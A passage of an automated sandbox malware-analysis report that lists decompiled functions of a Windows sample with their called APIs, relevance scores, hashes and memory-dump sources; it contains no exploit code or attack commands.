Instruction Fuzzy Hash: 1AC19F74A0421AEFDB14CFA4C884EBEBBB5FF48304B149598E995EB251D730ED81DB90

Function 00F1E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00F1E0BE
CharLowerBuffW.USER32(?,?), ref: 00F1E101

Part of subcall function 00F1D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00F1D7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00F1E301
_memmove.LIBCMT ref: 00F1E314

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: ce195196391b6b787d865862fe7c2a0fb80424c5f17db1c8602217a61e52b242
Instruction ID: 78471fc8708c8ae01a087bfc8f7b7108689ffcee65bc8efe1e02adc24aab2b1f
Opcode Fuzzy Hash: ce195196391b6b787d865862fe7c2a0fb80424c5f17db1c8602217a61e52b242
Instruction Fuzzy Hash: 3AC13A71A04341DFC714DF28C490A6ABBE4FF89724F14896EF899AB351D731E986CB81

Function 00F18093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00F180C3
CoUninitialize.OLE32 ref: 00F180CE

Part of subcall function 00EFD56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00EFD5D4

VariantInit.OLEAUT32(?), ref: 00F180D9
VariantClear.OLEAUT32(?), ref: 00F183AA

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 0f99d8ac0bc08a736965a8502a83a49a51ccf46548915d87d4bc003adfdf8c43
Instruction ID: ead508d8611fad8e69a7f0ea85e916800bc64f9ee11d2309adc61044abf02a64
Opcode Fuzzy Hash: 0f99d8ac0bc08a736965a8502a83a49a51ccf46548915d87d4bc003adfdf8c43
Instruction Fuzzy Hash: 55A168356047019FCB04DF24C981B6AB7E4BF8A364F144458F996AB3A2CB34FD46DB82

Function 00EF7530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00F32C7C,?), ref: 00EF76EA
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00F32C7C,?), ref: 00EF7702
CLSIDFromProgID.OLE32(?,?,00000000,00F2FB80,000000FF,?,00000000,00000800,00000000,?,00F32C7C,?), ref: 00EF7727
_memcmp.LIBCMT ref: 00EF7748

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: dd7e49b88ea954771b3c61d195bff896ea936a14d09f36925a8a80d984ba1687
Instruction ID: 43ac8e21077f5834960980a88e825f09f7c00646962b099ef9c7d00600840401
Opcode Fuzzy Hash: dd7e49b88ea954771b3c61d195bff896ea936a14d09f36925a8a80d984ba1687
Instruction Fuzzy Hash: 4D811871A10109EFCB04DFA4C984EEEB7B9FF89315F204199E546BB250DB71AE06CB60

Function 00EF687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00EF688E
SysAllocString.OLEAUT32(00000000), ref: 00EF6937
VariantCopy.OLEAUT32 ref: 00EF6966
VariantClear.OLEAUT32(?), ref: 00EF698D

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 2b38b0e81e9ad967c2f12203abb11be21e5182619b4a7dc7de276932dae932cd
Instruction ID: 82f43b1b084a577fec36636474e99302f7acc7a37cdcbe5b54a5e5280c149a02
Opcode Fuzzy Hash: 2b38b0e81e9ad967c2f12203abb11be21e5182619b4a7dc7de276932dae932cd
Instruction Fuzzy Hash: 9A51C174700709DBDB24EF65D891A7AB3E5AF49314F20E81FE696FB292DB70D8408711

Function 00F297F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(016BF388,?), ref: 00F29863
ScreenToClient.USER32(00000002,00000002), ref: 00F29896
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00F29903

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 3026a293cec1ebbe0b3c670422c44372c9e0a3df1709196c5c3d8dc8f6ecbbb6
Instruction ID: f895d590f9de84d5346d76d92a507d8ff599af8cbb3bd9d8ff739799670a53a3
Opcode Fuzzy Hash: 3026a293cec1ebbe0b3c670422c44372c9e0a3df1709196c5c3d8dc8f6ecbbb6
Instruction Fuzzy Hash: A3514134904219EFCF10CF64D980AAE7BB5FF45370F548169F865AB2A0D771AD81DB90

Function 00EF9A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00EF9AD2
__itow.LIBCMT ref: 00EF9B03

Part of subcall function 00EF9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00EF9DBE

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00EF9B6C
__itow.LIBCMT ref: 00EF9BC3

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: cfe6a9ff133efe7d157016d6c8bacbddf006efa1cb99ffbd8da47db63294c1e6
Instruction ID: 3026e72fd7d9971bd985186f3f9b776f83db9d4abc7240387c7d2dce83ac5fa6
Opcode Fuzzy Hash: cfe6a9ff133efe7d157016d6c8bacbddf006efa1cb99ffbd8da47db63294c1e6
Instruction Fuzzy Hash: C1416270A0020CABDF15EF54D845BFE7BF9EF49714F001059BA8576292DB70AA45CBA1

Function 00F169AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00F169D1
WSAGetLastError.WSOCK32(00000000), ref: 00F169E1

Part of subcall function 00EA9837: __itow.LIBCMT ref: 00EA9862
Part of subcall function 00EA9837: __swprintf.LIBCMT ref: 00EA98AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00F16A45
WSAGetLastError.WSOCK32(00000000), ref: 00F16A51

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 28d70e120c5b0a88e6ac19530aa4c1599bd563b03642b8ebcb3be46ee39fadd5
Instruction ID: e9c7db4add15bc05a2c75130011e48d418ffb12aa5a6eb8f06570750cc3b2770
Opcode Fuzzy Hash: 28d70e120c5b0a88e6ac19530aa4c1599bd563b03642b8ebcb3be46ee39fadd5
Instruction Fuzzy Hash: 9741C3357002006FEB24AF24CC86F7A77E89F09B10F048428FA19BF2D3DA74AD019791

Function 00F1641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00F2F910), ref: 00F164A7
_strlen.LIBCMT ref: 00F164D9

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 2aaf7adf52bfa51912470e2e85c1ddc0c7f78a274cf11bf328fe30f6a9a999de
Instruction ID: 655213e34cb526fcf9f8f4bcef8850a97891d435482170f9b9940c8abac53341
Opcode Fuzzy Hash: 2aaf7adf52bfa51912470e2e85c1ddc0c7f78a274cf11bf328fe30f6a9a999de
Instruction Fuzzy Hash: 9D41A635900104ABCB14EBA4DC95FFEB7F9AF49310F148169F919EB292DB30AD45DB50

Function 00F0B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00F0B89E
GetLastError.KERNEL32(?,00000000), ref: 00F0B8C4
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00F0B8E9
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00F0B915

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 1986c21decf9ec6e074c224010cc98eb067d7877afa056090e3dc47b4da0fa95
Instruction ID: f7791eb54740cb5632d701627139c9119758ff680a1aadb3591f4be34dc56511
Opcode Fuzzy Hash: 1986c21decf9ec6e074c224010cc98eb067d7877afa056090e3dc47b4da0fa95
Instruction Fuzzy Hash: 4E412C35A00514DFCB14DF15C544A5ABBE1EF4A720F058098ED4AAF3A2CB34FD02EB91

Function 00F28851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F288DE

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: d0977df6780f9b05670cacda7339ecef46fe4f9c0b36b593aaa474cec4fa21f4
Instruction ID: 87641f46ecbc2fd16a5181e8943a98904247cf763d8193c9c8f4df8384ecc4ce
Opcode Fuzzy Hash: d0977df6780f9b05670cacda7339ecef46fe4f9c0b36b593aaa474cec4fa21f4
Instruction Fuzzy Hash: 6D31D634A42128AFEB209A68EC45FF87BA5EB0A7A0F544111F911E61A1CE70D992B753

Function 00F2AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00F2AB60
GetWindowRect.USER32(?,?), ref: 00F2ABD6
PtInRect.USER32(?,?,00F2C014), ref: 00F2ABE6
MessageBeep.USER32(00000000), ref: 00F2AC57

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 491f44d7a18e33d9034518f528cdf6d53fff562a2f10c940faf390d3e39a9e15
Instruction ID: 6a02a246c4060420f3b6bdf5066934d3ab8c92be1a584fc2d6f6e53670a2db5f
Opcode Fuzzy Hash: 491f44d7a18e33d9034518f528cdf6d53fff562a2f10c940faf390d3e39a9e15
Instruction Fuzzy Hash: 22417F31A40129DFCB21DF58E884B69BBF5FF89710F1880A9E855DB364D770E841EB92

Function 00F00AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00F00B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 00F00B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00F00BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00F00BFB

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: fcc376fba1082d11a5382b6c33431c506b1fdef02c45232dbd9544b17cc1d8c0
Instruction ID: 91f3d86be2ff6bcd79523bb39b04902aaa35dd9fe3c2b96ede9baf265a9575e9
Opcode Fuzzy Hash: fcc376fba1082d11a5382b6c33431c506b1fdef02c45232dbd9544b17cc1d8c0
Instruction Fuzzy Hash: 16315AB0E4021CAEFF308B298C05BFABBA5BB85334F08436AF581D21D1CBB48945B755

Function 00F00C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,76AAC0D0,?,00008000), ref: 00F00C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 00F00C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 00F00CE1
SendInput.USER32(00000001,?,0000001C,76AAC0D0,?,00008000), ref: 00F00D33

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 34aa425906aa5f4750e7e0904d0bd8d2ea588c5839c0b7a24e1bf0f8a35ea9bf
Instruction ID: bc751f85c326b167064f68cbc9e337ca39cc11928f912cecd87e14e2d6874d31
Opcode Fuzzy Hash: 34aa425906aa5f4750e7e0904d0bd8d2ea588c5839c0b7a24e1bf0f8a35ea9bf
Instruction Fuzzy Hash: D0313830E4025CAEFF348B658C15BFEBBB6AB45330F08832BE485621D1CB799945B765

Function 00ED61C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00ED61FB
__isleadbyte_l.LIBCMT ref: 00ED6229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00ED6257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00ED628D

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 26623bcc614a22d5a6f2bf0c71055b5da10532370603c6df1e38143fc28fde08
Instruction ID: 9bbab63d0fc3d9a29c2e215ab81079ab9cb8e6404e09968eb14a94ca5ded078e
Opcode Fuzzy Hash: 26623bcc614a22d5a6f2bf0c71055b5da10532370603c6df1e38143fc28fde08
Instruction Fuzzy Hash: D531F131600246EFEF218F74CD45BBA7BB9FF41314F15502AE864A72A1E731E952DB90

Function 00F24EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00F24F02

Part of subcall function 00F03641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F0365B
Part of subcall function 00F03641: GetCurrentThreadId.KERNEL32 ref: 00F03662
Part of subcall function 00F03641: AttachThreadInput.USER32(00000000,?,00F05005), ref: 00F03669

GetCaretPos.USER32(?), ref: 00F24F13
ClientToScreen.USER32(00000000,?), ref: 00F24F4E
GetForegroundWindow.USER32 ref: 00F24F54

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 0bbdfeb93d8a3548090663eee7c3cee256b5c622262d2963645e70f7fefd03ae
Instruction ID: 82a8f490b796312aed96aa8df75ebbb0a4eb7d87c36276247405aefbbdbdc4ff
Opcode Fuzzy Hash: 0bbdfeb93d8a3548090663eee7c3cee256b5c622262d2963645e70f7fefd03ae
Instruction Fuzzy Hash: 1C312B72D00108AFDB14EFA5CD859EFB7FDEF89300F10406AE815E7242DA75AE458BA0

Function 00F2C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00EA2612: GetWindowLongW.USER32(?,000000EB), ref: 00EA2623

GetCursorPos.USER32(?), ref: 00F2C4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00EDB9AB,?,?,?,?,?), ref: 00F2C4E7
GetCursorPos.USER32(?), ref: 00F2C534
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00EDB9AB,?,?,?), ref: 00F2C56E

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: cce4367ade9eee8a2f468fe112c01069165e510efd96233be9683be923abffb4
Instruction ID: 7428b4d39d89f5f89e118d8731d07b2ec24c354d323cc39b43acfbe0c8297eed
Opcode Fuzzy Hash: cce4367ade9eee8a2f468fe112c01069165e510efd96233be9683be923abffb4
Instruction Fuzzy Hash: 9A31F039A00028AFCB21CF58D859EEE7BF5EB09320F484069F9059B261C731AD51EBE0

Function 00EF8656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00EF8121
Part of subcall function 00EF810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00EF812B
Part of subcall function 00EF810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EF813A
Part of subcall function 00EF810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00EF8141
Part of subcall function 00EF810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EF8157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00EF86A3
_memcmp.LIBCMT ref: 00EF86C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00EF86FC
HeapFree.KERNEL32(00000000), ref: 00EF8703

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 624f8e93378158c700c8a6a063f9c696eef1894acd4781219d366a6600c49dc0
Instruction ID: ec62eb646fbb4856d6535d0c1565ab12e8aec96fbea3f7d5f645b3f47aa1e81e
Opcode Fuzzy Hash: 624f8e93378158c700c8a6a063f9c696eef1894acd4781219d366a6600c49dc0
